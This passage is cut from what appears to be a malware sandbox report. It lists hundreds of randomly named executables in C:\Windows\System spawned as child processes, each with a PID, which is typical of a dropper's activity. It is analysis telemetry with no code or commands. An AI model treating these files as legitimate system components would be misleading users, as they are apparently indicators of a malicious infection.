- C:\Windows\System\FVfDEEa.exe
  C:\Windows\System\FVfDEEa.exe
  2⤵
  PID:7748
- C:\Windows\System\GzIBvYM.exe
  C:\Windows\System\GzIBvYM.exe
  2⤵
  PID:7896
- C:\Windows\System\UJrXKem.exe
  C:\Windows\System\UJrXKem.exe
  2⤵
  PID:7976
- C:\Windows\System\tlFzBgD.exe
  C:\Windows\System\tlFzBgD.exe
  2⤵
  PID:8092
- C:\Windows\System\leAIaBp.exe
  C:\Windows\System\leAIaBp.exe
  2⤵
  PID:7260
- C:\Windows\System\yTvOblt.exe
  C:\Windows\System\yTvOblt.exe
  2⤵
  PID:7588
- C:\Windows\System\YAdCMXS.exe
  C:\Windows\System\YAdCMXS.exe
  2⤵
  PID:7492
- C:\Windows\System\kelsBlk.exe
  C:\Windows\System\kelsBlk.exe
  2⤵
  PID:2712
- C:\Windows\System\RnfGbfC.exe
  C:\Windows\System\RnfGbfC.exe
  2⤵
  PID:8220
- C:\Windows\System\lnEoKaa.exe
  C:\Windows\System\lnEoKaa.exe
  2⤵
  PID:8252
- C:\Windows\System\WEiXgGO.exe
  C:\Windows\System\WEiXgGO.exe
  2⤵
  PID:8276
- C:\Windows\System\peWQlpJ.exe
  C:\Windows\System\peWQlpJ.exe
  2⤵
  PID:8300
- C:\Windows\System\DneGozf.exe
  C:\Windows\System\DneGozf.exe
  2⤵
  PID:8344
- C:\Windows\System\vxzpskg.exe
  C:\Windows\System\vxzpskg.exe
  2⤵
  PID:8380
- C:\Windows\System\BQlgDpm.exe
  C:\Windows\System\BQlgDpm.exe
  2⤵
  PID:8396
- C:\Windows\System\pMcwOVX.exe
  C:\Windows\System\pMcwOVX.exe
  2⤵
  PID:8436
- C:\Windows\System\qVEsyfy.exe
  C:\Windows\System\qVEsyfy.exe
  2⤵
  PID:8460
- C:\Windows\System\dDZnKeQ.exe
  C:\Windows\System\dDZnKeQ.exe
  2⤵
  PID:8496
- C:\Windows\System\GrZyagq.exe
  C:\Windows\System\GrZyagq.exe
  2⤵
  PID:8516
- C:\Windows\System\tnOQfZD.exe
  C:\Windows\System\tnOQfZD.exe
  2⤵
  PID:8548
- C:\Windows\System\FYcKWjN.exe
  C:\Windows\System\FYcKWjN.exe
  2⤵
  PID:8568
- C:\Windows\System\XmtoMFC.exe
  C:\Windows\System\XmtoMFC.exe
  2⤵
  PID:8612
- C:\Windows\System\iorjhfx.exe
  C:\Windows\System\iorjhfx.exe
  2⤵
  PID:8636
- C:\Windows\System\oYZNQvz.exe
  C:\Windows\System\oYZNQvz.exe
  2⤵
  PID:8656
- C:\Windows\System\KnXIZoo.exe
  C:\Windows\System\KnXIZoo.exe
  2⤵
  PID:8680
- C:\Windows\System\WxhFZbK.exe
  C:\Windows\System\WxhFZbK.exe
  2⤵
  PID:8712
- C:\Windows\System\JBJqeDW.exe
  C:\Windows\System\JBJqeDW.exe
  2⤵
  PID:8732
- C:\Windows\System\LXcLfpf.exe
  C:\Windows\System\LXcLfpf.exe
  2⤵
  PID:8760
- C:\Windows\System\FAoICws.exe
  C:\Windows\System\FAoICws.exe
  2⤵
  PID:8784
- C:\Windows\System\iqIARwm.exe
  C:\Windows\System\iqIARwm.exe
  2⤵
  PID:8804
- C:\Windows\System\VrKvimm.exe
  C:\Windows\System\VrKvimm.exe
  2⤵
  PID:8832
- C:\Windows\System\gnyGGzc.exe
  C:\Windows\System\gnyGGzc.exe
  2⤵
  PID:8852
- C:\Windows\System\OTrhVuV.exe
  C:\Windows\System\OTrhVuV.exe
  2⤵
  PID:8904
- C:\Windows\System\IRsAjhd.exe
  C:\Windows\System\IRsAjhd.exe
  2⤵
  PID:8940
- C:\Windows\System\BijKcZz.exe
  C:\Windows\System\BijKcZz.exe
  2⤵
  PID:8972
- C:\Windows\System\nUZHqgk.exe
  C:\Windows\System\nUZHqgk.exe
  2⤵
  PID:8992
- C:\Windows\System\KyjteUi.exe
  C:\Windows\System\KyjteUi.exe
  2⤵
  PID:9032
- C:\Windows\System\ZsUIpsL.exe
  C:\Windows\System\ZsUIpsL.exe
  2⤵
  PID:9056
- C:\Windows\System\FzCIgVC.exe
  C:\Windows\System\FzCIgVC.exe
  2⤵
  PID:9072
- C:\Windows\System\zajfnjp.exe
  C:\Windows\System\zajfnjp.exe
  2⤵
  PID:9092
- C:\Windows\System\yKbeGaR.exe
  C:\Windows\System\yKbeGaR.exe
  2⤵
  PID:9120
- C:\Windows\System\yBtfrBE.exe
  C:\Windows\System\yBtfrBE.exe
  2⤵
  PID:9148
- C:\Windows\System\SOThnLM.exe
  C:\Windows\System\SOThnLM.exe
  2⤵
  PID:9168
- C:\Windows\System\sHCqIsI.exe
  C:\Windows\System\sHCqIsI.exe
  2⤵
  PID:9196
- C:\Windows\System\YbEKIFf.exe
  C:\Windows\System\YbEKIFf.exe
  2⤵
  PID:8244
- C:\Windows\System\nzGJtAs.exe
  C:\Windows\System\nzGJtAs.exe
  2⤵
  PID:8336
- C:\Windows\System\sFQxmOA.exe
  C:\Windows\System\sFQxmOA.exe
  2⤵
  PID:8452
- C:\Windows\System\FPOQBhc.exe
  C:\Windows\System\FPOQBhc.exe
  2⤵
  PID:8536
- C:\Windows\System\rfoaYcE.exe
  C:\Windows\System\rfoaYcE.exe
  2⤵
  PID:8560
- C:\Windows\System\vghSwFY.exe
  C:\Windows\System\vghSwFY.exe
  2⤵
  PID:8628
- C:\Windows\System\qEIPUTt.exe
  C:\Windows\System\qEIPUTt.exe
  2⤵
  PID:8704
- C:\Windows\System\TuAuqxZ.exe
  C:\Windows\System\TuAuqxZ.exe
  2⤵
  PID:8816
- C:\Windows\System\LLvVRvh.exe
  C:\Windows\System\LLvVRvh.exe
  2⤵
  PID:8888
- C:\Windows\System\vXpHaFI.exe
  C:\Windows\System\vXpHaFI.exe
  2⤵
  PID:8960
- C:\Windows\System\jRGAaRS.exe
  C:\Windows\System\jRGAaRS.exe
  2⤵
  PID:9024
- C:\Windows\System\qHpaKEa.exe
  C:\Windows\System\qHpaKEa.exe
  2⤵
  PID:9068
- C:\Windows\System\zjXmggV.exe
  C:\Windows\System\zjXmggV.exe
  2⤵
  PID:9140
- C:\Windows\System\XzcRYBG.exe
  C:\Windows\System\XzcRYBG.exe
  2⤵
  PID:9180
- C:\Windows\System\mKAYXbF.exe
  C:\Windows\System\mKAYXbF.exe
  2⤵
  PID:8292
- C:\Windows\System\ZvJeTUu.exe
  C:\Windows\System\ZvJeTUu.exe
  2⤵
  PID:8492
- C:\Windows\System\wkmNaKh.exe
  C:\Windows\System\wkmNaKh.exe
  2⤵
  PID:8676
- C:\Windows\System\gTcglQv.exe
  C:\Windows\System\gTcglQv.exe
  2⤵
  PID:8900
- C:\Windows\System\wCWBKeR.exe
  C:\Windows\System\wCWBKeR.exe
  2⤵
  PID:8924
- C:\Windows\System\MbUPFhM.exe
  C:\Windows\System\MbUPFhM.exe
  2⤵
  PID:9192
- C:\Windows\System\rkSezOR.exe
  C:\Windows\System\rkSezOR.exe
  2⤵
  PID:8564
- C:\Windows\System\eiJZLZh.exe
  C:\Windows\System\eiJZLZh.exe
  2⤵
  PID:8884
- C:\Windows\System\qqmzHwh.exe
  C:\Windows\System\qqmzHwh.exe
  2⤵
  PID:9236
- C:\Windows\System\qvWbohc.exe
  C:\Windows\System\qvWbohc.exe
  2⤵
  PID:9252
- C:\Windows\System\ZVZRaOn.exe
  C:\Windows\System\ZVZRaOn.exe
  2⤵
  PID:9272
- C:\Windows\System\PAstfen.exe
  C:\Windows\System\PAstfen.exe
  2⤵
  PID:9328
- C:\Windows\System\CllsXtZ.exe
  C:\Windows\System\CllsXtZ.exe
  2⤵
  PID:9344
- C:\Windows\System\xFrwDYM.exe
  C:\Windows\System\xFrwDYM.exe
  2⤵
  PID:9364
- C:\Windows\System\GfxUpel.exe
  C:\Windows\System\GfxUpel.exe
  2⤵
  PID:9412
- C:\Windows\System\XlJuWGF.exe
  C:\Windows\System\XlJuWGF.exe
  2⤵
  PID:9432
- C:\Windows\System\tcFHoIk.exe
  C:\Windows\System\tcFHoIk.exe
  2⤵
  PID:9452
- C:\Windows\System\xPxzUot.exe
  C:\Windows\System\xPxzUot.exe
  2⤵
  PID:9472
- C:\Windows\System\SCfvcuj.exe
  C:\Windows\System\SCfvcuj.exe
  2⤵
  PID:9492
- C:\Windows\System\hvfyWWV.exe
  C:\Windows\System\hvfyWWV.exe
  2⤵
  PID:9536
- C:\Windows\System\olrlJDq.exe
  C:\Windows\System\olrlJDq.exe
  2⤵
  PID:9552
- C:\Windows\System\KxtcqpE.exe
  C:\Windows\System\KxtcqpE.exe
  2⤵
  PID:9572
- C:\Windows\System\uuNcmLS.exe
  C:\Windows\System\uuNcmLS.exe
  2⤵
  PID:9612
- C:\Windows\System\wgXcUgY.exe
  C:\Windows\System\wgXcUgY.exe
  2⤵
  PID:9648
- C:\Windows\System\wZxlusk.exe
  C:\Windows\System\wZxlusk.exe
  2⤵
  PID:9668
- C:\Windows\System\pOakfuC.exe
  C:\Windows\System\pOakfuC.exe
  2⤵
  PID:9708
- C:\Windows\System\NMeltME.exe
  C:\Windows\System\NMeltME.exe
  2⤵
  PID:9728
- C:\Windows\System\jhbRUOF.exe
  C:\Windows\System\jhbRUOF.exe
  2⤵
  PID:9784
- C:\Windows\System\eNRgfJw.exe
  C:\Windows\System\eNRgfJw.exe
  2⤵
  PID:9824
- C:\Windows\System\MrPoZqx.exe
  C:\Windows\System\MrPoZqx.exe
  2⤵
  PID:9840
- C:\Windows\System\ggjfqJW.exe
  C:\Windows\System\ggjfqJW.exe
  2⤵
  PID:9856
- C:\Windows\System\zIdXfnT.exe
  C:\Windows\System\zIdXfnT.exe
  2⤵
  PID:9960
- C:\Windows\System\tqGiFOV.exe
  C:\Windows\System\tqGiFOV.exe
  2⤵
  PID:9980
- C:\Windows\System\jeTPxbh.exe
  C:\Windows\System\jeTPxbh.exe
  2⤵
  PID:10052
- C:\Windows\System\vAwaQVj.exe
  C:\Windows\System\vAwaQVj.exe
  2⤵
  PID:10072
- C:\Windows\System\yEBuXMr.exe
  C:\Windows\System\yEBuXMr.exe
  2⤵
  PID:10088
- C:\Windows\System\PEmchQf.exe
  C:\Windows\System\PEmchQf.exe
  2⤵
  PID:10104
- C:\Windows\System\GtMWWaF.exe
  C:\Windows\System\GtMWWaF.exe
  2⤵
  PID:10120
- C:\Windows\System\vhAFTuw.exe
  C:\Windows\System\vhAFTuw.exe
  2⤵
  PID:10136
- C:\Windows\System\EJcvuDZ.exe
  C:\Windows\System\EJcvuDZ.exe
  2⤵
  PID:10152
- C:\Windows\System\JCJWIje.exe
  C:\Windows\System\JCJWIje.exe
  2⤵
  PID:10168
- C:\Windows\System\vhhtpdR.exe
  C:\Windows\System\vhhtpdR.exe
  2⤵
  PID:10184
- C:\Windows\System\VHpgCxV.exe
  C:\Windows\System\VHpgCxV.exe
  2⤵
  PID:10200
- C:\Windows\System\lHLdIwJ.exe
  C:\Windows\System\lHLdIwJ.exe
  2⤵
  PID:10216
- C:\Windows\System\EecdZUb.exe
  C:\Windows\System\EecdZUb.exe
  2⤵
  PID:10232
- C:\Windows\System\qLHzlQk.exe
  C:\Windows\System\qLHzlQk.exe
  2⤵
  PID:8248
- C:\Windows\System\PaOGlym.exe
  C:\Windows\System\PaOGlym.exe
  2⤵
  PID:9248
- C:\Windows\System\EWFKvBY.exe
  C:\Windows\System\EWFKvBY.exe
  2⤵
  PID:9388
- C:\Windows\System\NivcIlw.exe
  C:\Windows\System\NivcIlw.exe
  2⤵
  PID:9544
- C:\Windows\System\tlLMxCP.exe
  C:\Windows\System\tlLMxCP.exe
  2⤵
  PID:9640
- C:\Windows\System\sTaTuFT.exe
  C:\Windows\System\sTaTuFT.exe
  2⤵
  PID:9832
- C:\Windows\System\WYqJMDu.exe
  C:\Windows\System\WYqJMDu.exe
  2⤵
  PID:9908
- C:\Windows\System\CIVXYbM.exe
  C:\Windows\System\CIVXYbM.exe
  2⤵
  PID:9872
- C:\Windows\System\nsfaKCT.exe
  C:\Windows\System\nsfaKCT.exe
  2⤵
  PID:9912
- C:\Windows\System\CSjTLLs.exe
  C:\Windows\System\CSjTLLs.exe
  2⤵
  PID:10160
- C:\Windows\System\zFYBJVG.exe
  C:\Windows\System\zFYBJVG.exe
  2⤵
  PID:10228
- C:\Windows\System\OzHaHFn.exe
  C:\Windows\System\OzHaHFn.exe
  2⤵
  PID:10012
- C:\Windows\System\mjTPaaw.exe
  C:\Windows\System\mjTPaaw.exe
  2⤵
  PID:10036
- C:\Windows\System\fXxuMHs.exe
  C:\Windows\System\fXxuMHs.exe
  2⤵
  PID:10116
- C:\Windows\System\EcbMycm.exe
  C:\Windows\System\EcbMycm.exe
  2⤵
  PID:9396
- C:\Windows\System\rySwmZE.exe
  C:\Windows\System\rySwmZE.exe
  2⤵
  PID:9720
- C:\Windows\System\YEGeaSL.exe
  C:\Windows\System\YEGeaSL.exe
  2⤵
  PID:9604
- C:\Windows\System\VhkeTNd.exe
  C:\Windows\System\VhkeTNd.exe
  2⤵
  PID:9632
- C:\Windows\System\nYAYiCP.exe
  C:\Windows\System\nYAYiCP.exe
  2⤵
  PID:9756
- C:\Windows\System\iQeqIge.exe
  C:\Windows\System\iQeqIge.exe
  2⤵
  PID:9904
- C:\Windows\System\VjuRqgH.exe
  C:\Windows\System\VjuRqgH.exe
  2⤵
  PID:10068
- C:\Windows\System\MkwvOMe.exe
  C:\Windows\System\MkwvOMe.exe
  2⤵
  PID:9100
- C:\Windows\System\oFmQoUC.exe
  C:\Windows\System\oFmQoUC.exe
  2⤵
  PID:9696
- C:\Windows\System\FLuzxkr.exe
  C:\Windows\System\FLuzxkr.exe
  2⤵
  PID:9888
- C:\Windows\System\zRKmqcm.exe
  C:\Windows\System\zRKmqcm.exe
  2⤵
  PID:10176
- C:\Windows\System\xrhuceD.exe
  C:\Windows\System\xrhuceD.exe
  2⤵
  PID:8648
- C:\Windows\System\bbOXTdI.exe
  C:\Windows\System\bbOXTdI.exe
  2⤵
  PID:10244
- C:\Windows\System\nEfouxY.exe
  C:\Windows\System\nEfouxY.exe
  2⤵
  PID:10268
- C:\Windows\System\VLxKntv.exe
  C:\Windows\System\VLxKntv.exe
  2⤵
  PID:10292
- C:\Windows\System\TVitKoj.exe
  C:\Windows\System\TVitKoj.exe
  2⤵
  PID:10324
- C:\Windows\System\BdCqlul.exe
  C:\Windows\System\BdCqlul.exe
  2⤵
  PID:10344
- C:\Windows\System\GYMMCvx.exe
  C:\Windows\System\GYMMCvx.exe
  2⤵
  PID:10364
- C:\Windows\System\qQOJUka.exe
  C:\Windows\System\qQOJUka.exe
  2⤵
  PID:10388
- C:\Windows\System\KXdeijP.exe
  C:\Windows\System\KXdeijP.exe
  2⤵
  PID:10416
- C:\Windows\System\MNNbjqy.exe
  C:\Windows\System\MNNbjqy.exe
  2⤵
  PID:10440
- C:\Windows\System\pUSUSPO.exe
  C:\Windows\System\pUSUSPO.exe
  2⤵
  PID:10464
- C:\Windows\System\oyUszIq.exe
  C:\Windows\System\oyUszIq.exe
  2⤵
  PID:10488
- C:\Windows\System\qmWYMYt.exe
  C:\Windows\System\qmWYMYt.exe
  2⤵
  PID:10520
- C:\Windows\System\AnshbKJ.exe
  C:\Windows\System\AnshbKJ.exe
  2⤵
  PID:10544
- C:\Windows\System\WTMkPsf.exe
  C:\Windows\System\WTMkPsf.exe
  2⤵
  PID:10584
- C:\Windows\System\kmmMUYN.exe
  C:\Windows\System\kmmMUYN.exe
  2⤵
  PID:10604
- C:\Windows\System\zLfxvBl.exe
  C:\Windows\System\zLfxvBl.exe
  2⤵
  PID:10664
- C:\Windows\System\BOgTLbs.exe
  C:\Windows\System\BOgTLbs.exe
  2⤵
  PID:10684
- C:\Windows\System\ZaqgPtG.exe
  C:\Windows\System\ZaqgPtG.exe
  2⤵
  PID:10728
- C:\Windows\System\uyAzjoV.exe
  C:\Windows\System\uyAzjoV.exe
  2⤵
  PID:10748
- C:\Windows\System\wrsPtNL.exe
  C:\Windows\System\wrsPtNL.exe
  2⤵
  PID:10772
- C:\Windows\System\TMvXjvT.exe
  C:\Windows\System\TMvXjvT.exe
  2⤵
  PID:10796
- C:\Windows\System\TwmLHOp.exe
  C:\Windows\System\TwmLHOp.exe
  2⤵
  PID:10816
- C:\Windows\System\NSycjvS.exe
  C:\Windows\System\NSycjvS.exe
  2⤵
  PID:10880
- C:\Windows\System\mRgVPvw.exe
  C:\Windows\System\mRgVPvw.exe
  2⤵
  PID:10916
- C:\Windows\System\uIoYoMN.exe
  C:\Windows\System\uIoYoMN.exe
  2⤵
  PID:10936
- C:\Windows\System\qXIrPHn.exe
  C:\Windows\System\qXIrPHn.exe
  2⤵
  PID:10960
- C:\Windows\System\ouaxGMg.exe
  C:\Windows\System\ouaxGMg.exe
  2⤵
  PID:10996
- C:\Windows\System\PWDDmJD.exe
  C:\Windows\System\PWDDmJD.exe
  2⤵
  PID:11036
- C:\Windows\System\qdUJLVr.exe
  C:\Windows\System\qdUJLVr.exe
  2⤵
  PID:11064
- C:\Windows\System\PzCzLGZ.exe
  C:\Windows\System\PzCzLGZ.exe
  2⤵
  PID:11092
- C:\Windows\System\pbzSPBd.exe
  C:\Windows\System\pbzSPBd.exe
  2⤵
  PID:11120
- C:\Windows\System\DBuZjkl.exe
  C:\Windows\System\DBuZjkl.exe
  2⤵
  PID:11136
- C:\Windows\System\bPWxwiS.exe
  C:\Windows\System\bPWxwiS.exe
  2⤵
  PID:11160
- C:\Windows\System\dVYDyWM.exe
  C:\Windows\System\dVYDyWM.exe
  2⤵
  PID:11176
- C:\Windows\System\lUEtoRY.exe
  C:\Windows\System\lUEtoRY.exe
  2⤵
  PID:11196
- C:\Windows\System\iSNVunq.exe
  C:\Windows\System\iSNVunq.exe
  2⤵
  PID:11220
- C:\Windows\System\AunRdym.exe
  C:\Windows\System\AunRdym.exe
  2⤵
  PID:9048
- C:\Windows\System\pNFpaYS.exe
  C:\Windows\System\pNFpaYS.exe
  2⤵
  PID:9884
- C:\Windows\System\RgkRAHW.exe
  C:\Windows\System\RgkRAHW.exe
  2⤵
  PID:10304
- C:\Windows\System\EmPLPPB.exe
  C:\Windows\System\EmPLPPB.exe
  2⤵
  PID:10376
- C:\Windows\System\rllFcoN.exe
  C:\Windows\System\rllFcoN.exe
  2⤵
  PID:10472
- C:\Windows\System\ZmcfDWs.exe
  C:\Windows\System\ZmcfDWs.exe
  2⤵
  PID:10512
- C:\Windows\System\JpgtqDi.exe
  C:\Windows\System\JpgtqDi.exe
  2⤵
  PID:10536
- C:\Windows\System\pwnSghf.exe
  C:\Windows\System\pwnSghf.exe
  2⤵
  PID:10680
- C:\Windows\System\NRUKuDU.exe
  C:\Windows\System\NRUKuDU.exe
  2⤵
  PID:10768
- C:\Windows\System\vKlAygS.exe
  C:\Windows\System\vKlAygS.exe
  2⤵
  PID:10696
- C:\Windows\System\NwSZBRp.exe
  C:\Windows\System\NwSZBRp.exe
  2⤵
  PID:10744
- C:\Windows\System\VdIcvsm.exe
  C:\Windows\System\VdIcvsm.exe
  2⤵
  PID:10828
- C:\Windows\System\xsroplZ.exe
  C:\Windows\System\xsroplZ.exe
  2⤵
  PID:10892
- C:\Windows\System\iuGKUZI.exe
  C:\Windows\System\iuGKUZI.exe
  2⤵
  PID:10976
- C:\Windows\System\DPRvaXI.exe
  C:\Windows\System\DPRvaXI.exe
  2⤵
  PID:11152
- C:\Windows\System\pIWBXgI.exe
  C:\Windows\System\pIWBXgI.exe
  2⤵
  PID:11204
- C:\Windows\System\eARizgg.exe
  C:\Windows\System\eARizgg.exe
  2⤵
  PID:11260
- C:\Windows\System\lmousAn.exe
  C:\Windows\System\lmousAn.exe
  2⤵
  PID:10360
- C:\Windows\System\PBzLsGE.exe
  C:\Windows\System\PBzLsGE.exe
  2⤵
  PID:10532
- C:\Windows\System\XaFIMxU.exe
  C:\Windows\System\XaFIMxU.exe
  2⤵
  PID:10792
- C:\Windows\System\mnaePCi.exe
  C:\Windows\System\mnaePCi.exe
  2⤵
  PID:10564
- C:\Windows\System\TIUxnBF.exe
  C:\Windows\System\TIUxnBF.exe
  2⤵
  PID:10948
- C:\Windows\System\oIauFnY.exe
  C:\Windows\System\oIauFnY.exe
  2⤵
  PID:11228
- C:\Windows\System\pXdfHKp.exe
  C:\Windows\System\pXdfHKp.exe
  2⤵
  PID:10284
- C:\Windows\System\oOZxNeX.exe
  C:\Windows\System\oOZxNeX.exe
  2⤵
  PID:10596
- C:\Windows\System\AUdgUeq.exe
  C:\Windows\System\AUdgUeq.exe
  2⤵
  PID:10640
- C:\Windows\System\NySsRtM.exe
  C:\Windows\System\NySsRtM.exe
  2⤵
  PID:11084
- C:\Windows\System\AWGGnvB.exe
  C:\Windows\System\AWGGnvB.exe
  2⤵
  PID:4308
- C:\Windows\System\vpTssRf.exe
  C:\Windows\System\vpTssRf.exe
  2⤵
  PID:10616
- C:\Windows\System\pVpxETm.exe
  C:\Windows\System\pVpxETm.exe
  2⤵
  PID:11320
- C:\Windows\System\jFgrupy.exe
  C:\Windows\System\jFgrupy.exe
  2⤵
  PID:11336
- C:\Windows\System\bGikbVF.exe
  C:\Windows\System\bGikbVF.exe
  2⤵
  PID:11360
- C:\Windows\System\jRkTGfJ.exe
  C:\Windows\System\jRkTGfJ.exe
  2⤵
  PID:11380
- C:\Windows\System\MpfrJou.exe
  C:\Windows\System\MpfrJou.exe
  2⤵
  PID:11400
- C:\Windows\System\jKmrCaL.exe
  C:\Windows\System\jKmrCaL.exe
  2⤵
  PID:11428
- C:\Windows\System\TzGCIaA.exe
  C:\Windows\System\TzGCIaA.exe
  2⤵
  PID:11452
- C:\Windows\System\qaZTftQ.exe
  C:\Windows\System\qaZTftQ.exe
  2⤵
  PID:11472
- C:\Windows\System\RILxvQD.exe
  C:\Windows\System\RILxvQD.exe
  2⤵
  PID:11504
- C:\Windows\System\wjeMzbn.exe
  C:\Windows\System\wjeMzbn.exe
  2⤵
  PID:11536
- C:\Windows\System\FcdOEKM.exe
  C:\Windows\System\FcdOEKM.exe
  2⤵
  PID:11580
- C:\Windows\System\jgaYxvA.exe
  C:\Windows\System\jgaYxvA.exe
  2⤵
  PID:11604
- C:\Windows\System\NnozFhN.exe
  C:\Windows\System\NnozFhN.exe
  2⤵
  PID:11624
- C:\Windows\System\yqZVpYU.exe
  C:\Windows\System\yqZVpYU.exe
  2⤵
  PID:11640
- C:\Windows\System\jcynXAP.exe
  C:\Windows\System\jcynXAP.exe
  2⤵
  PID:11704
- C:\Windows\System\QaYsdNy.exe
  C:\Windows\System\QaYsdNy.exe
  2⤵
  PID:11724
- C:\Windows\System\TncEPnj.exe
  C:\Windows\System\TncEPnj.exe
  2⤵
  PID:11752
- C:\Windows\System\yAFMDVi.exe
  C:\Windows\System\yAFMDVi.exe
  2⤵
  PID:11780
- C:\Windows\System\xSEXMNX.exe
  C:\Windows\System\xSEXMNX.exe
  2⤵
  PID:11804
- C:\Windows\System\OistXDh.exe
  C:\Windows\System\OistXDh.exe
  2⤵
  PID:11824
- C:\Windows\System\mYaRSHC.exe
  C:\Windows\System\mYaRSHC.exe
  2⤵
  PID:11860
- C:\Windows\System\upqpwmS.exe
  C:\Windows\System\upqpwmS.exe
  2⤵
  PID:11888
- C:\Windows\System\wajVFDo.exe
  C:\Windows\System\wajVFDo.exe
  2⤵
  PID:11908
- C:\Windows\System\DeyPqgQ.exe
  C:\Windows\System\DeyPqgQ.exe
  2⤵
  PID:11932
- C:\Windows\System\afvBfOc.exe
  C:\Windows\System\afvBfOc.exe
  2⤵
  PID:11948
- C:\Windows\System\YUXNLlU.exe
  C:\Windows\System\YUXNLlU.exe
  2⤵
  PID:11992
- C:\Windows\System\xBBiQBQ.exe
  C:\Windows\System\xBBiQBQ.exe
  2⤵
  PID:12028
- C:\Windows\System\ybDQOMG.exe
  C:\Windows\System\ybDQOMG.exe
  2⤵
  PID:12044
- C:\Windows\System\lPVdiQp.exe
  C:\Windows\System\lPVdiQp.exe
  2⤵
  PID:12072
- C:\Windows\System\gkPgbHA.exe
  C:\Windows\System\gkPgbHA.exe
  2⤵
  PID:12108
- C:\Windows\System\MKNqBgC.exe
  C:\Windows\System\MKNqBgC.exe
  2⤵
  PID:12128
- C:\Windows\System\LeANLDY.exe
  C:\Windows\System\LeANLDY.exe
  2⤵
  PID:12148
- C:\Windows\System\JfhEzLW.exe
  C:\Windows\System\JfhEzLW.exe
  2⤵
  PID:12172
- C:\Windows\System\SQWgnJs.exe
  C:\Windows\System\SQWgnJs.exe
  2⤵
  PID:12200
- C:\Windows\System\eSFNPHc.exe
  C:\Windows\System\eSFNPHc.exe
  2⤵
  PID:12224
- C:\Windows\System\kslHIOe.exe
  C:\Windows\System\kslHIOe.exe
  2⤵
  PID:12268
- C:\Windows\System\EflHDDq.exe
  C:\Windows\System\EflHDDq.exe
  2⤵
  PID:11008
- C:\Windows\System\csLDOYL.exe
  C:\Windows\System\csLDOYL.exe
  2⤵
  PID:11280
- C:\Windows\System\Zaohbfv.exe
  C:\Windows\System\Zaohbfv.exe
  2⤵
  PID:11392
- C:\Windows\System\VdYWpXc.exe
  C:\Windows\System\VdYWpXc.exe
  2⤵
  PID:11424
- C:\Windows\System\AVnjpQu.exe
  C:\Windows\System\AVnjpQu.exe
  2⤵
  PID:11532
- C:\Windows\System\aCjYUoO.exe
  C:\Windows\System\aCjYUoO.exe
  2⤵
  PID:11552
- C:\Windows\System\RjfsndN.exe
  C:\Windows\System\RjfsndN.exe
  2⤵
  PID:11632
- C:\Windows\System\IhjzxNd.exe
  C:\Windows\System\IhjzxNd.exe
  2⤵
  PID:11696
- C:\Windows\System\FRlYMBI.exe
  C:\Windows\System\FRlYMBI.exe
  2⤵
  PID:11716
- C:\Windows\System\GkBgTme.exe
  C:\Windows\System\GkBgTme.exe
  2⤵
  PID:11776
- C:\Windows\System\PDJyuic.exe
  C:\Windows\System\PDJyuic.exe
  2⤵
  PID:11836
- C:\Windows\System\WZsJOxp.exe
  C:\Windows\System\WZsJOxp.exe
  2⤵
  PID:11900
- C:\Windows\System\qdDvLzx.exe
  C:\Windows\System\qdDvLzx.exe
  2⤵
  PID:11940
- C:\Windows\System\FzeJWsm.exe
  C:\Windows\System\FzeJWsm.exe
  2⤵
  PID:12020
- C:\Windows\System\xDGnDHV.exe
  C:\Windows\System\xDGnDHV.exe
  2⤵
  PID:12064
- C:\Windows\System\YoxhTuZ.exe
  C:\Windows\System\YoxhTuZ.exe
  2⤵
  PID:12164
- C:\Windows\System\SXefBTL.exe
  C:\Windows\System\SXefBTL.exe
  2⤵
  PID:11276
- C:\Windows\System\yleAEjY.exe
  C:\Windows\System\yleAEjY.exe
  2⤵
  PID:11352
- C:\Windows\System\likpotn.exe
  C:\Windows\System\likpotn.exe
  2⤵
  PID:11612
- C:\Windows\System\KAUvJuK.exe
  C:\Windows\System\KAUvJuK.exe
  2⤵
  PID:11576
- C:\Windows\System\YJIFARv.exe
  C:\Windows\System\YJIFARv.exe
  2⤵
  PID:11856
- C:\Windows\System\NrZuhOf.exe
  C:\Windows\System\NrZuhOf.exe
  2⤵
  PID:11924
- C:\Windows\System\UzFSLEN.exe
  C:\Windows\System\UzFSLEN.exe
  2⤵
  PID:12264
- C:\Windows\System\EztKxWc.exe
  C:\Windows\System\EztKxWc.exe
  2⤵
  PID:12276
- C:\Windows\System\twoHnUC.exe
  C:\Windows\System\twoHnUC.exe
  2⤵
  PID:11528
- C:\Windows\System\wTGICzp.exe
  C:\Windows\System\wTGICzp.exe
  2⤵
  PID:11568
- C:\Windows\System\TwUzYhR.exe
  C:\Windows\System\TwUzYhR.exe
  2⤵
  PID:12144
- C:\Windows\System\hdeEotv.exe
  C:\Windows\System\hdeEotv.exe
  2⤵
  PID:11664
- C:\Windows\System\bVcavLP.exe
  C:\Windows\System\bVcavLP.exe
  2⤵
  PID:12316
- C:\Windows\System\uomjlFj.exe
  C:\Windows\System\uomjlFj.exe
  2⤵
  PID:12340
- C:\Windows\System\eVZlzCf.exe
  C:\Windows\System\eVZlzCf.exe
  2⤵
  PID:12428
- C:\Windows\System\RBEJotx.exe
  C:\Windows\System\RBEJotx.exe
  2⤵
  PID:12448
- C:\Windows\System\EvARtYo.exe
  C:\Windows\System\EvARtYo.exe
  2⤵
  PID:12488
- C:\Windows\System\IxLdLOI.exe
  C:\Windows\System\IxLdLOI.exe
  2⤵
  PID:12504
- C:\Windows\System\wGFypGk.exe
  C:\Windows\System\wGFypGk.exe
  2⤵
  PID:12528
- C:\Windows\System\ftvRIgm.exe
  C:\Windows\System\ftvRIgm.exe
  2⤵
  PID:12556
- C:\Windows\System\MPOvJzs.exe
  C:\Windows\System\MPOvJzs.exe
  2⤵
  PID:12576
- C:\Windows\System\WtnnOGW.exe
  C:\Windows\System\WtnnOGW.exe
  2⤵
  PID:12616
- C:\Windows\System\GcCggHx.exe
  C:\Windows\System\GcCggHx.exe
  2⤵
  PID:12632
- C:\Windows\System\HEaHKmz.exe
  C:\Windows\System\HEaHKmz.exe
  2⤵
  PID:12652
- C:\Windows\System\fpsPXJA.exe
  C:\Windows\System\fpsPXJA.exe
  2⤵
  PID:12700
- C:\Windows\System\nWtvYJP.exe
  C:\Windows\System\nWtvYJP.exe
  2⤵
  PID:12728
- C:\Windows\System\QcqlJZg.exe
  C:\Windows\System\QcqlJZg.exe
  2⤵
  PID:12748
- C:\Windows\System\GMThIiJ.exe
  C:\Windows\System\GMThIiJ.exe
  2⤵
  PID:12776
- C:\Windows\System\tXDNhHW.exe
  C:\Windows\System\tXDNhHW.exe
  2⤵
  PID:12804
- C:\Windows\System\YMCYQJo.exe
  C:\Windows\System\YMCYQJo.exe
